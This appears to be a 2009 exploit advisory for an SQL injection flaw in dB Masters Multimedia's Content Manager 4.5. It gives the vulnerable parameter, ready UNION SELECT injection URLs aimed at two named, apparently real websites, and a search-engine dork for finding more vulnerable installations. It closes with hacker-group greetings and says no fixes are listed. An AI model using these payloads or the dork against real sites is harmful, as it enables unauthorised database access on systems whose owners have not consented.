dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability

2009-07-16 18:32:30

===========================================================================================


[o]

Software : dB Masters Multimedia's Content Manager version 4.5
Vendor : http://www.dbmasters.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com


===========================================================================================


[o] Vulnerable file

index.php



[o] Exploit

http://localhost/[path]/index.php?n=xx&id=[SQL]



[o] Proof of concept

http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--



[o] Dork

"Powered by dB Masters Multimedia's Content Manager"


===========================================================================================


[o] Greetz

MainHack BrotherHood [ http://serverisdown.org/news ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===========================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.